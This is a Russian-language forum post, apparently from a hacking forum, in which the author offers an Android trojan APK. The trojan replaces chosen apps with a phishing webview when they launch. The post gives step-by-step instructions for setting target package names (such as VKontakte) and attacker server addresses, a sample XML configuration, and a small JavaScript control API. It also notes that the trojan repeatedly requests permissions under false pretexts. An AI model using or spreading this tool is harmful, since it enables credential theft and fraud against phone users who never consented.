• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Фишинг приложений в Android - Как подменить приложение и открыть webview с нужной нам интернет страницей

tabac

CPU register
Пользователь
Решения
1
Реакции
3 332
Вечер добрый, хочу добавить немного зла в этот мир. В общем, я написал софт который во время запуска определённого приложения, подменяет его и открывает webview с нужной нам интернет страницей.

Я дам вам apk, в нём необходимо модифицировать ресурсы с помощью апк эдитора, я положил его в архив(обратите внимание это не оригинальный apkEditor, а модификация. Я нашёл его на одном русскоязычном форуме, мод исправляет отображение массивов). Ниже я приведу подробную инструкцию, по редактированию ресурсов через ApkEditor, вы можете попробовать проделать тоже самое через apktool, но лично у меня ничего, apktool не хочет собирать apk обратно.

Инструкция

1) Скачиваем содержимое архива на телефон, устанавливаем ApkEditor
2) Запускаем ApkEditor

screenshot-2020-01-26_03.09.51.971.png

3) Нажимаем "Выберете файл APK" находим скачанный FalseScreen.apk

screenshot-2020-01-26_03.24.08.307.png

4) Далее: полное редактирование->редатировать все файлы->вкладка файл->res/values/arrays.xml

screenshot-2020-01-26_03.11.16.175.png

5) Открываем файл arrays.xml меняем "com.android.example" на имя нужного нам пакета (имя пакета можно узнать через ApkEditor или PlayMarket), также меняем "http://my.server" на адрес любого веб сайта.

screenshot-2020-01-26_03.13.55.373.png

6) Сохраняем файл, нажимаем "сборка"
7) Наш apk готов

Демонстрация

После открытия, наш троян с определённым временным интервалом будет под разными предлогами выпрашивать права.

Текст сообщения можно изменить, в ресурсах /res/values/strng.xml (также можно поменять название приложения).

Ну собственно запуск:

Возможности
  1. Автозагрузка будет работать только если приложение было хоть раз запущено
  2. Приложение закрывается при нажатии кнопок "домой" и "меню"
  3. Вы можете работать сразу по нескольким приложениям, для этого просто добавляйте больше item-ов в arrays.xml
XML:
<string-array name="prog_list">
        <item>com.vkontakte.android</item>
        <item>ru.fourpda.client</item>
    </string-array>

<string-array name="server_addr">
        <item>http://192.168.0.20/</item>
        <item>http://yandex.ru</item>
    </string-array>
Косяки

Я мало уделял внимания тестированию, а весь код состоит из костылей и чёрной магии, следовательно багов будет много
  1. Не всегда работает скрытие окна т.е. при нажатие кнопок "домой" или "меню" приложение не закроется и будет висеть в списке открытых приложений
  2. Кнопка "назад" ничего не делает в принципе могу реальзовать навигацию по webview-у
  3. Иногда после запуска требуется перезагрузка
  4. На СНГ банках не будет работать фишинг, я сделал это намеренно
УХ!!! Api, это звучит гордо!! на самом деле есть всего две функии, которые может выполнить веб сервер
Код:
<script type="text/javascript">JAVA.SetNavigationBarColor('#528bcc')</script>
Данный скрипт меняет цвет NavigationBar-a цвет указывайте вместо #528bcc
Код:
<script>JAVA.OK()</script>
Выполнив данный скрипт фишинг для данного приложения прекращается и начинается отслеживание следующего приложения в очереди.

Опишите то чего вам здесь не хватает, до тех пор пока я не забил, могу что нибуть реализовать

Буду рад услышать ваши отзывы идеи, предложения, оскорбления и угрозы. если что не понятно пишите попробую объяснить.

P.S. Прошу прощения за совершённые мной орфографические ошибки, данная статья писалась поздно ночью, сейчас уже утро, моя голова не работать, слабая плоть :(

Софт работает на Android 6+(если комуто надо могу запустить на Android 5.1)

Кто скачал, будьте добры отпишите: Всё ли работает и на чём тестируете. Я очень не уверен в коде отвечающем за закрытие приложения. Так же сам процесс может умирать, я не знаю как обстоят дела с китайцами.

Автор @Napalm
источник codeby

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх